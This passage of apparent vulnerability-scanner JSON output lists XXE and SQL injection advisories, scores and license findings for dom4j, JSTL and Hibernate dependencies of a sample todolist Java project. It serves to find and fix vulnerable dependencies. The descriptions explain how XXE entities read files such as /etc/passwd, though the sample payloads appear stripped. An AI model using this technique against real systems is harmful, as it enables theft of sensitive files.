"2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": 
"2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - 
], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. 
These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - 
"type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - 
"functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": 
"secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - 
"version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - 
"fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## 
Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - 
"title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": 